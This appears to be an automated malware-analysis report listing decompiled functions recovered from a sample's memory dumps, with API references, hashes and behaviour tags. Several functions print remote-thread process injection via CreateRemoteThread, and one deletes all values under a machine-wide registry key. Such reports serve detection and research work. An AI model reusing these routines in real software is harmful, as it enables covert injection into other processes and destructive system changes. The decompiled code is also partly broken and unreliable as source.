Function 00403020, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50 Total matches: 3
threadinjection

Similarity

Total matches: 3
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
String ID: !$@
API String ID: 3598368018-1106925043
Opcode ID: 94e025a43e91df62a48eb6b8a64d63848b0e0c680d25aaeca4969afcd1c9ee64
Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
Opcode Fuzzy Hash: CCD0A700DE1DC65871531046B5E47F3F1049F121CED5C379532992CB0C4B257038A241
Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c

C-Code - Quality: 33%

			E00403020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}

0x00403026
0x0040302b
0x00403035
0x0040303b
0x00403043
0x00403045
0x0040304d
0x00403050
0x00403055
0x00403061
0x00403066
0x00403067
0x00403068
0x0040306e
0x0040306a
0x0040306a
0x0040306a
0x00403078
0x0040307e
0x0040307e
0x00403057
0x00403057
0x00403057
0x00403087
0x00403087
0x00403091

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,00402421,00000000,00000000), ref: 00403045
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 00403070
GetExitCodeThread.KERNEL32(?,?,?,?,!$@,004036DB,?,00000000,!$@,00000000,00000001,?,?,004031F9,?,?), ref: 0040307E
CloseHandle.KERNEL32(?), ref: 00403087

Strings

!$@, xrefs: 00403020

Memory Dump Source

Source File: 00000001.00000002.260180009.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.260173827.00400000.00000002.sdmp
Associated: 00000001.00000002.260188653.00405000.00000004.sdmp
Associated: 00000001.00000002.260196655.00407000.00000002.sdmp

Function 001D1E99, Relevance: 7.6, APIs: 5, Instructions: 63 Total matches: 6
thread

Similarity

Total matches: 6
API ID: CreateEvent$CreateThreadInitializeCriticalSectionSetThreadPriority
String ID:
API String ID: 1443725771-0
Opcode ID: cc963cedaaa8c141a90b6ba0a701b58c993f7297ed142496386f8b666d6d3d38
Instruction ID: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1
Opcode Fuzzy Hash: B6E0DF84A25A4FC5C437E090203F77BA4207B0E9CADDC8521308F1AFA6BF08D406AB08
Instruction Fuzzy Hash: 1c04ac80769ce1897cd6b8eb1393fb0302c44cedc3ed2add9cab6c9954ae0cc1

C-Code - Quality: 100%

			E001D1E99(intOrPtr _a4, long _a8, _Unknown_base(*)()* _a12, int _a16) {
				signed char _t21;
				intOrPtr _t26;
				void* _t29;
				void* _t33;
				void* _t41;

				_t41 = _a8;
				_t21 =  *(_t41 + 0x1b44);
				if((_t21 & 0x00000001) == 0) {
					 *(_t41 + 0x1b44) = _t21 | 0x00000001;
					_t26 = _a4;
					 *((intOrPtr*)(_t41 + 0x1b48)) = _t26;
					 *((intOrPtr*)(_t41 + 0x1b14)) =  *((intOrPtr*)(_t26 + 0x70));
					InitializeCriticalSection(_t41 + 0x1b18);
					 *((intOrPtr*)(_t41 + 0x1b40)) = CreateEventA(0, 1, 0, 0);
					_t29 = CreateEventA(0, 1, 0, 0);
					 *(_t41 + 0x1b10) = _t29;
					if( *((intOrPtr*)(_t41 + 0x1b40)) == 0 || _t29 == 0) {
						L6:
						E001D19F3(_t41);
					} else {
						if(_a12 == 0) {
							L5:
							SetThreadPriority( *(_t41 + 0x1b0c), _a16);
						} else {
							_t33 = CreateThread(0, 0, _a12, _t41, 0,  &_a8);
							 *(_t41 + 0x1b0c) = _t33;
							if(_t33 == 0) {
								goto L6;
							} else {
								goto L5;
							}
						}
					}
				}
				return 0;
			}

0x001d1e9d
0x001d1ea0
0x001d1ea8
0x001d1eb0
0x001d1eb6
0x001d1ebd
0x001d1ecb
0x001d1ed1
0x001d1eeb
0x001d1ef1
0x001d1ef9
0x001d1eff
0x001d1f36
0x001d1f37
0x001d1f05
0x001d1f08
0x001d1f25
0x001d1f2e
0x001d1f0a
0x001d1f15
0x001d1f1d
0x001d1f23
0x00000000
0x00000000
0x00000000
0x00000000
0x001d1f23
0x001d1f08
0x001d1f3d
0x001d1f4b

APIs

InitializeCriticalSection.KERNEL32(?), ref: 001D1ED1
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EE4
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 001D1EF1
CreateThread.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 001D1F15
SetThreadPriority.KERNEL32(?,?), ref: 001D1F2E

Part of subcall function 001D19F3: EnterCriticalSection.KERNEL32(?,00000000,?,76E1186A,?,001D1F3C,?), ref: 001D1A12
Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A29
Part of subcall function 001D19F3: SetEvent.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A36
Part of subcall function 001D19F3: WaitForSingleObject.KERNEL32(?,000007D0), ref: 001D1A50
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A58
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A68
Part of subcall function 001D19F3: CloseHandle.KERNEL32(?), ref: 001D1A75
Part of subcall function 001D19F3: DeleteCriticalSection.KERNEL32(?,?,76E1186A,?,001D1F3C,?), ref: 001D1A78

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1BAA, Relevance: 7.5, APIs: 5, Instructions: 36 Total matches: 6
threadsynchronizationinjection

Similarity

Total matches: 6
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadGetStdHandleWaitForSingleObject
String ID:
API String ID: 1527658926-0
Opcode ID: 7410b3e9b634f2cff0a98ddadfc08129967f86c080f8268996739ca556ef27d6
Instruction ID: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083
Opcode Fuzzy Hash: 6FC012804A5C0AB20527F0083D5D3060355AD112D146C7331715849542DF5CB269FF87
Instruction Fuzzy Hash: 6c9db9ca0fa4e0924711bf0fce69b9ac659a614394427811d75d21b82a4ad083

C-Code - Quality: 100%

			E001D1BAA(void* __ecx, void* __eflags, void* _a4) {
				long _v8;
				long _v12;
				void* _t7;
				void* _t19;

				_v8 = _v8 & 0x00000000;
				_t7 = GetStdHandle(0xfffffff4);
				_t19 = CreateRemoteThread(_t7, 0, 0, E001D1722(E001D2165), _a4, 0,  &_v12);
				if(_t19 != 0) {
					WaitForSingleObject(_t19, 0xffffffff);
					GetExitCodeThread(_t19,  &_v8);
					CloseHandle(_t19);
				}
				return _v8;
			}

0x001d1baf
0x001d1bb6
0x001d1bdd
0x001d1be1
0x001d1be6
0x001d1bf1
0x001d1bf8
0x001d1bf8
0x001d1c03

APIs

GetStdHandle.KERNEL32(000000F4), ref: 001D1BB6
CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?), ref: 001D1BD7
WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 001D1BE6
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 001D1BF1
CloseHandle.KERNEL32(00000000), ref: 001D1BF8

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D17D0, Relevance: 6.1, APIs: 4, Instructions: 138 Total matches: 6
synchronizationfile

Similarity

Total matches: 6
API ID: WaitForSingleObject$ReadFileResetEvent
String ID:
API String ID: 102907011-0
Opcode ID: 0299335ab9a3911fde22b8564450798ac63aade05c8ce35b27bba24940fd14d6
Instruction ID: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29
Opcode Fuzzy Hash: F711368702CDCBF5C032FC00282A7AE5040ABCAAF5D5DD33662A525AC07F49E106B748
Instruction Fuzzy Hash: f643c25c3e36a1ac1f5b66a08822f782b8fe4e2cd4be92b33a8443d888aa5c29

C-Code - Quality: 84%

			E001D17D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t70;
				void* _t71;
				intOrPtr _t72;
				long _t77;
				void* _t85;
				intOrPtr _t87;
				long _t89;
				void* _t93;
				void* _t95;
				long _t97;
				void* _t112;
				intOrPtr _t114;
				void* _t115;

				_push(0x24);
				_push(0x1d1430);
				E001D1637(__ebx, __edi, __esi);
				 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
				_t114 =  *((intOrPtr*)(_t115 + 8));
				_t112 =  *((intOrPtr*)(_t114 + 0x1b48)) + 0x1bc8;
				 *(_t115 - 0x24) =  *(_t114 + 0x1b14);
				if(( *(_t114 + 0x1b44) & 0x00000004) != 0) {
					WaitForSingleObject( *(_t112 + 0x1b40), 0xffffffff);
				}
				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
				while(( *(_t112 + 0x1b44) & 0x00000001) != 0 && ( *(_t114 + 0x1b44) & 0x00000001) != 0) {
					 *(_t115 - 0x20) =  *(_t115 - 0x20) + 1;
					_t70 =  *(_t115 - 0x20);
					if(_t70 == 0) {
						 *(_t115 - 0x30) = 0xd80;
						continue;
					}
					_t71 = _t70 - 1;
					if(_t71 == 0) {
						__eflags =  *(_t115 - 0x30) - 0xd80;
						if( *(_t115 - 0x30) > 0xd80) {
							 *(_t115 - 0x30) = 0xd80;
						}
						_t72 =  *((intOrPtr*)(_t114 + 0x1b48));
						__eflags =  *((intOrPtr*)(_t72 + 0x6c)) - 3;
						if(__eflags != 0) {
							ResetEvent( *(_t114 + 0x1b40));
							_t77 = ReadFile( *(_t115 - 0x24), _t114 + 0xd8c,  *(_t115 - 0x30), _t115 - 0x1c, _t114 + 0x1b30);
							__eflags = _t77;
							if(_t77 == 0) {
								_push( *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c));
								_push(0xa);
								E001D3644( *(_t115 - 0x24), _t115 - 0x1c, _t114 + 0x1b30);
							}
						} else {
							_push(_t115 - 0x1c);
							_push( *(_t115 - 0x30));
							_t107 = _t114 + 0xd8c;
							_push(_t114 + 0xd8c);
							_push(_t72);
							E001D1F4E(0xd80, _t112, _t114, __eflags);
						}
						__eflags =  *(_t115 - 0x1c);
						if(__eflags == 0) {
							__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c);
							if(__eflags != 0) {
								E001D1672( *(_t115 - 0x24));
							}
						}
						continue;
					}
					_t85 = _t71 - 1;
					if(_t85 == 0) {
						_t87 = 0xd80 -  *((intOrPtr*)(_t114 + 8));
						 *((intOrPtr*)(_t115 - 0x28)) = _t87;
						__eflags =  *(_t115 - 0x1c) - _t87;
						if( *(_t115 - 0x1c) > _t87) {
							_t107 =  *(_t115 - 0x1c) - _t87;
							__eflags =  *(_t115 - 0x1c) - _t87;
							E001D176E(_t112,  *(_t115 - 0x1c) - _t87, _t114, 0,  *(_t115 - 0x1c) - _t87);
						}
						_t89 = E001D20DA(0xd80, _t107, _t114, _t114 + 0xd8c,  *(_t115 - 0x1c));
						__eflags = _t89;
						if(_t89 == 0) {
							E001D1672( *(_t115 - 0x24));
						}
						__eflags =  *( *((intOrPtr*)(_t114 + 0x1b48)) + 0x6c) - 3;
						if(__eflags != 0) {
							L22:
							 *(_t115 - 0x20) =  *(_t115 - 0x20) & 0x00000000;
						}
						continue;
					}
					_t93 = _t85 - 1;
					if(_t93 == 0) {
						WaitForSingleObject( *(_t112 + 0x1b10), 0xffffffff);
						continue;
					}
					_t95 = _t93 - 1;
					if(_t95 == 0) {
						_t97 = E001D176E(_t112, __eflags, _t112, _t112 + 0xd8c, 0xd80);
						 *(_t115 - 0x1c) = _t97;
						__eflags = _t97;
						if(__eflags != 0) {
							continue;
						}
						goto L22;
					}
					_t126 = _t95 != 1;
					if(_t95 != 1) {
						continue;
					}
					E001D2F13(_t112, 2);
					_push( *(_t115 - 0x1c));
					_push(_t112 + 0xd8c);
					_push( *((intOrPtr*)(_t112 + 0x1b48)));
					if(E001D2046(0xd80, _t114, _t126) == 0) {
						E001D1672( *(_t115 - 0x24));
					}
					E001D2F13(_t112, 1);
					goto L22;
				}
				 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
				__eflags = 0;
				return E001D173E(0);
			}

0x001d17d0
0x001d17d2
0x001d17d7
0x001d17dc
0x001d17e0
0x001d17e9
0x001d17f5
0x001d17ff
0x001d1809
0x001d1809
0x001d180f
0x001d1818
0x001d1835
0x001d1838
0x001d183b
0x001d19a2
0x00000000
0x001d19a2
0x001d1841
0x001d1842
0x001d1905
0x001d1908
0x001d190a
0x001d190a
0x001d190d
0x001d1913
0x001d1917
0x001d1935
0x001d1953
0x001d1959
0x001d195b
0x001d1963
0x001d1966
0x001d1976
0x001d1976
0x001d1919
0x001d191c
0x001d191d
0x001d1920
0x001d1926
0x001d1927
0x001d1928
0x001d1928
0x001d197b
0x001d197f
0x001d198b
0x001d198f
0x001d1998
0x001d1998
0x001d198f
0x00000000
0x001d197f
0x001d1848
0x001d1849
0x001d18b7
0x001d18ba
0x001d18bd
0x001d18c0
0x001d18c5
0x001d18c5
0x001d18cb
0x001d18cb
0x001d18db
0x001d18e0
0x001d18e2
0x001d18e7
0x001d18e7
0x001d18f2
0x001d18f6
0x001d18fc
0x001d18fc
0x001d18fc
0x00000000
0x001d18f6
0x001d184b
0x001d184c
0x001d18aa
0x00000000
0x001d18aa
0x001d184e
0x001d184f
0x001d1890
0x001d1895
0x001d1898
0x001d189a
0x00000000
0x00000000
0x00000000
0x001d18a0
0x001d1851
0x001d1852
0x00000000
0x00000000
0x001d1857
0x001d185c
0x001d1865
0x001d1866
0x001d1873
0x001d1878
0x001d1878
0x001d1880
0x00000000
0x001d1880
0x001d19e5
0x001d19e9
0x001d19f0

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D1809

Part of subcall function 001D2F13: ResetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F3D
Part of subcall function 001D2F13: SetEvent.KERNEL32(?,?,?,00000D80,001D185C,?,00000002), ref: 001D2F49
Part of subcall function 001D2F13: WaitForSingleObject.KERNEL32(?,00000000), ref: 001D2F7C

Part of subcall function 001D2046: wsprintfA.USER32 ref: 001D2081

WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D18AA

Part of subcall function 001D176E: ResetEvent.KERNEL32(?,?,?,?,?,001D1CDD,?,?,00000240,?,?), ref: 001D17B5

Part of subcall function 001D20DA: SetEvent.KERNEL32(?,?,?), ref: 001D2147

ResetEvent.KERNEL32(?), ref: 001D1935
ReadFile.KERNEL32(?,?,?,?,?), ref: 001D1953

Part of subcall function 001D3644: GetLastError.KERNEL32(?,?,001D197B,?,?,?,0000000A,00000003), ref: 001D3646
Part of subcall function 001D3644: WaitForSingleObject.KERNEL32(?,000000FF), ref: 001D3660
Part of subcall function 001D3644: GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 001D3671

Part of subcall function 001D1672: RaiseException.KERNEL32(00000003,00000000,00000001,?,001D1AB9,?,001D1A90,?,?,001D2102,?), ref: 001D167D

Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
Part of subcall function 001D1F4E: lstrcpyA.KERNEL32(?,?), ref: 001D2009

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1466, Relevance: 6.1, APIs: 4, Instructions: 98 Total matches: 6
threadsynchronizationwindow

Similarity

Total matches: 6
API ID: CloseHandleCreateThreadPostThreadMessageWaitForSingleObject
String ID:
API String ID: 2693620855-0
Opcode ID: 6e6f1deaef2e8bfaf0bbf284ef32ef05483bd122caecc3e4ef501d8e832f1d31
Instruction ID: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68
Opcode Fuzzy Hash: BBF0A947480D4AF7D81B5931141CBBB7448B7CA3C18DCA65C30416752EAEDF325E9A5F
Instruction Fuzzy Hash: 94462b115e71142d27a6e53f557ff65113bd920af959ff06e8194a60a9f9cb68

C-Code - Quality: 97%

			E001D1466(void* __ecx, intOrPtr _a4) {
				char _v8;
				signed char _t11;
				void* _t12;
				intOrPtr _t14;
				void* _t16;
				void* _t20;
				intOrPtr* _t25;
				void* _t27;
				char* _t32;
				intOrPtr* _t33;
				intOrPtr* _t39;
				void* _t45;
				intOrPtr _t46;
				intOrPtr _t47;

				_t45 =  *0x1d5000; // 0x0
				if(_t45 == 0) {
					L5:
					__eflags =  *0x1d5078; // 0x0
					if(__eflags != 0) {
						L11:
						_t12 = 0;
						L14:
						L15:
						return _t12;
					}
					E001D37B7(_t11, 0x1d508c,  *0x1d5074);
					__eflags =  *0x1d50c4; // 0x1
					if(__eflags == 0) {
						_t20 = E001D37D0(0x28, 0,  &_v8);
						_t33 =  *0x1d5074; // 0x0
						asm("sbb ecx, ecx");
						__eflags =  ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2;
						if( ~( *_t33 -  *((intOrPtr*)(_t20 + 2))) + 2 != 0) {
							 *0x1d50bc = 0;
						}
					}
					__eflags =  *0x1d50bc; // 0x0
					if(__eflags != 0) {
						L13:
						 *0x1d5080 = 0x1d508c;
						_t12 = CreateThread(0, 0, E001D36F3, 0, 0, 0x1d5088);
						 *0x1d5000 = _t12;
						goto L14;
					} else {
						 *0x1d5084 =  *0x1d5084 + 1;
						_t14 =  *0x1d5084; // 0x0
						__eflags = _t14 - _a4;
						if(_t14 < _a4) {
							_t16 = E001D37D0(0x28, 0,  &_v8);
							_t32 =  *0x1d5074; // 0x0
							 *_t32 =  *((intOrPtr*)(_t16 + 2));
							E001D37B7( *((intOrPtr*)(_t16 + 2)), 0x1d508c,  *0x1d5074);
							 *0x1d50c4 = 1;
							 *0x1d50bc = 1;
							goto L13;
						}
						goto L11;
					}
				}
				PostThreadMessageA( *0x1d5088, 0x12, 0, 0);
				WaitForSingleObject( *0x1d5000, 0x7530);
				CloseHandle( *0x1d5000);
				 *0x1d5000 = 0;
				_t25 = E001D37D0(0x1e, 0,  &_v8);
				_t46 =  *0x1d5049; // 0x0
				_t11 =  *_t25;
				if(_t46 != 0) {
					L3:
					if((_t11 & 0x00000004) == 0) {
						goto L5;
					}
					_t27 = E001D37D0(0x28, 0,  &_v8);
					_t39 =  *0x1d5074; // 0x0
					 *((char*)(_t27 + 2)) =  *_t39 - 1;
					_t12 = 0;
					goto L15;
				}
				_t47 =  *0x1d50bc; // 0x0
				if(_t47 == 0) {
					goto L5;
				}
				goto L3;
			}

0x001d146d
0x001d1473
0x001d14ea
0x001d14ea
0x001d14f1
0x001d1549
0x001d1549
0x001d159d
0x001d159e
0x001d15a0
0x001d15a0
0x001d14ff
0x001d1504
0x001d150a
0x001d1513
0x001d1518
0x001d1525
0x001d1528
0x001d1529
0x001d152b
0x001d152b
0x001d1529
0x001d1531
0x001d1537
0x001d157e
0x001d158c
0x001d1592
0x001d1598
0x00000000
0x001d1539
0x001d1539
0x001d153f
0x001d1544
0x001d1547
0x001d1554
0x001d155c
0x001d1562
0x001d156b
0x001d1570
0x001d1577
0x00000000
0x001d1577
0x00000000
0x001d1547
0x001d1537
0x001d147f
0x001d1490
0x001d149c
0x001d14a9
0x001d14af
0x001d14b4
0x001d14ba
0x001d14bc
0x001d14c6
0x001d14c8
0x00000000
0x00000000
0x001d14d1
0x001d14d6
0x001d14e0
0x001d14e3
0x00000000
0x001d14e3
0x001d14be
0x001d14c4
0x00000000
0x00000000
0x00000000

APIs

PostThreadMessageA.USER32(00000012,00000000,00000000), ref: 001D147F
WaitForSingleObject.KERNEL32(00007530), ref: 001D1490
CloseHandle.KERNEL32 ref: 001D149C
CreateThread.KERNEL32(00000000,00000000,001D36F3,00000000,00000000,001D5088), ref: 001D1592

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D1F4E, Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 79 Total matches: 6
string

Similarity

Total matches: 6
API ID: lstrcpy
String ID: ($TagId
API String ID: 3722407311-2515966560
Opcode ID: dbc64af6430ca1c5886ade0b967d05941ebfb9057e984414971c4070ddfe475d
Instruction ID: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3
Opcode Fuzzy Hash: FCF05C45404DB79BC52710821517B2E20D2AF46B8EC4233726635F6ECC0DD17008BF0D
Instruction Fuzzy Hash: fa5cba4715d104d4c09d20bb5c144b14be78e5e3a72b22bd9689641a04f682e3

C-Code - Quality: 59%

			E001D1F4E(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t52;
				signed int _t57;
				signed int _t61;
				intOrPtr _t63;
				void* _t64;

				_push(0x44);
				_push(0x1d1390);
				E001D1637(__ebx, __edi, __esi);
				_t63 =  *((intOrPtr*)(_t64 + 8));
				_t61 = 0;
				_t57 = 0;
				 *(_t64 - 4) = 0;
				while(1) {
					_push(0);
					_push(0);
					_push(_t64 - 0x20);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c80))() == 0 ||  *((intOrPtr*)(_t64 - 0x20)) == 0) {
						break;
					}
					_t52 =  *((intOrPtr*)(_t64 + 0x10)) - _t61;
					 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					if(_t52 >  *((intOrPtr*)(_t64 - 0x20))) {
						_t52 =  *((intOrPtr*)(_t64 - 0x20));
						 *((intOrPtr*)(_t64 - 0x24)) = _t52;
					}
					_push(_t64 - 0x1c);
					_push(_t52);
					_push( *((intOrPtr*)(_t64 + 0xc)) + _t61);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c84))() != 0 &&  *((intOrPtr*)(_t64 - 0x1c)) != 0) {
						_t61 = _t61 +  *((intOrPtr*)(_t64 - 0x1c));
						 *(_t64 - 0x28) = _t61;
						continue;
					}
					break;
				}
				 *( *(_t64 + 0x14)) = _t61;
				if(_t61 != 0) {
					lstrcpyA(_t64 - 0x54, "TagId");
					 *((intOrPtr*)(_t64 - 0x1c)) = 0x28;
					_push(0);
					_push(_t64 - 0x1c);
					_push(_t64 - 0x54);
					_push(0xffff);
					_push( *((intOrPtr*)(_t63 + 0x3c60)));
					if( *((intOrPtr*)(_t63 + 0x3c88))() != 0) {
						lstrcpyA(_t63 + 0x3cb0, _t64 - 0x54);
					}
					_t57 = E001D1603( *((intOrPtr*)(_t64 + 0xc)), _t61);
					 *(_t64 - 0x2c) = _t57;
				}
				 *(_t64 - 4) =  *(_t64 - 4) | 0xffffffff;
				if(_t57 == 0) {
					 *(_t63 + 0x5c) =  *(_t63 + 0x5c) & 0x000000fb;
					 *( *(_t64 + 0x14)) =  *( *(_t64 + 0x14)) & _t57;
				}
				return E001D173E(_t57);
			}

0x001d1f4e
0x001d1f50
0x001d1f55
0x001d1f5a
0x001d1f5d
0x001d1f5f
0x001d1f61
0x001d1f64
0x001d1f64
0x001d1f66
0x001d1f6b
0x001d1f6c
0x001d1f7a
0x00000000
0x00000000
0x001d1f85
0x001d1f87
0x001d1f8d
0x001d1f8f
0x001d1f92
0x001d1f92
0x001d1f98
0x001d1f99
0x001d1f9f
0x001d1fa0
0x001d1fae
0x001d1fb6
0x001d1fb9
0x00000000
0x001d1fb9
0x00000000
0x001d1fae
0x001d1fc1
0x001d1fc5
0x001d1fd6
0x001d1fd8
0x001d1fdf
0x001d1fe4
0x001d1fe8
0x001d1fe9
0x001d1fee
0x001d1ffc
0x001d2009
0x001d2009
0x001d2014
0x001d2016
0x001d2016
0x001d2019
0x001d2031
0x001d2033
0x001d203a
0x001d203a
0x001d2043

APIs

lstrcpyA.KERNEL32(?,TagId), ref: 001D1FD6
lstrcpyA.KERNEL32(?,?), ref: 001D2009

Strings

(, xrefs: 001D1FD8
TagId, xrefs: 001D1FC7

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D3020, Relevance: 6.0, APIs: 4, Instructions: 50 Total matches: 3
threadinjection

Similarity

Total matches: 3
API ID: CloseHandleCreateRemoteThreadGetExitCodeThreadWaitForMultipleObjects
String ID:
API String ID: 3598368018-0
Opcode ID: 02c1a043345bfcf4915c21911e954b3d5073dba7e642fc22e378a39fa225183a
Instruction ID: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c
Opcode Fuzzy Hash: 3BD0A900CE2DC9B876631047996CB73E2009F121CA98C378A32D90CB088B2E3038E341
Instruction Fuzzy Hash: 6812434df433a10a49eb64cdae1d93602e3d9f75bbdf674f19957a85cb12a94c

C-Code - Quality: 33%

			E001D3020(void* __ecx, void* _a4, _Unknown_base(*)()* _a8, void* _a12, intOrPtr _a16, DWORD* _a20, intOrPtr _a24) {
				intOrPtr _v8;
				struct _SECURITY_ATTRIBUTES* _v12;
				int _t13;
				DWORD* _t18;
				intOrPtr _t22;

				_t18 = _a20;
				_t22 = _a16;
				_v12 = 0;
				_v8 = _t22;
				 *_t18 = 0;
				_t13 = CreateRemoteThread(_a4, 0, 0, _a8, _a12, 0, 0);
				_v12 = _t13;
				if(_t13 != 0) {
					if(_a24 != 0) {
						_push(0xffffffff);
						_push(0);
						_push( &_v12);
						if(_t22 == 0) {
							_push(1);
						} else {
							_push(2);
						}
						if(WaitForMultipleObjects() == 0) {
							GetExitCodeThread(_v12, _t18);
						}
					} else {
						 *_t18 = 1;
					}
					_t13 = CloseHandle(_v12);
				}
				return _t13;
			}

0x001d3026
0x001d302b
0x001d3035
0x001d303b
0x001d3043
0x001d3045
0x001d304d
0x001d3050
0x001d3055
0x001d3061
0x001d3066
0x001d3067
0x001d3068
0x001d306e
0x001d306a
0x001d306a
0x001d306a
0x001d3078
0x001d307e
0x001d307e
0x001d3057
0x001d3057
0x001d3057
0x001d3087
0x001d3087
0x001d3091

APIs

CreateRemoteThread.KERNEL32(?,00000000,00000000,?,001D2421,00000000,00000000), ref: 001D3045
WaitForMultipleObjects.KERNEL32(00000001,?,00000000,000000FF), ref: 001D3070
GetExitCodeThread.KERNEL32(?,?,?,?,?,001D36DB,?,00000000,001D2421,00000000,00000001,?,?,001D31F9,?,?), ref: 001D307E
CloseHandle.KERNEL32(?), ref: 001D3087

Memory Dump Source

Source File: 00000001.00000002.260105408.001D1000.00000020.sdmp, Offset: 001D0000, based on PE: true

Associated: 00000001.00000002.260098942.001D0000.00000002.sdmp
Associated: 00000001.00000002.260113910.001D5000.00000004.sdmp
Associated: 00000001.00000002.260121138.001D7000.00000002.sdmp

Function 001D35DB, Relevance: 6.0, APIs: 4, Instructions: 45 Total matches: 6
registry

Similarity

Total matches: 6
API ID: RegCloseKeyRegDeleteValueRegEnumValueRegOpenKeyEx
String ID:
API String ID: 2802766549-0
Opcode ID: e8b56a8720ee6e3ece2d4dc4a7345ea2c28f84232851412fee7266dde94396d7
Instruction ID: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d
Opcode Fuzzy Hash: 15D0A982DC09873A2B430048AA3D7E8E072FA502C08ACA3F234800AE568F4F3008CF52
Instruction Fuzzy Hash: bfb9062b6176546c74d883c13d9a210422831c3169cc6c7731f438f327b3575d

C-Code - Quality: 100%

			E001D35DB() {
				void* _v8;
				int _v12;
				char _v44;
				long _t10;
				int _t18;

				_t10 = RegOpenKeyExA(0x80000002,  *0x1d5004, 0, 0xf003f,  &_v8);
				if(_t10 == 0) {
					_t18 = 0x20;
					while(1) {
						_v12 = _t18;
						if(RegEnumValueA(_v8, 0,  &_v44,  &_v12, 0, 0, 0, 0) != 0) {
							break;
						}
						RegDeleteValueA(_v8,  &_v44);
					}
					return RegCloseKey(_v8);
				}
				return _t10;
			}

0x001d35f9
0x001d3601
0x001d360d
0x001d361d
0x001d362d
0x001d3634
0x00000000
0x00000000
0x001d3617
0x001d3617
0x00000000
0x001d3640
0x001d3643

APIs

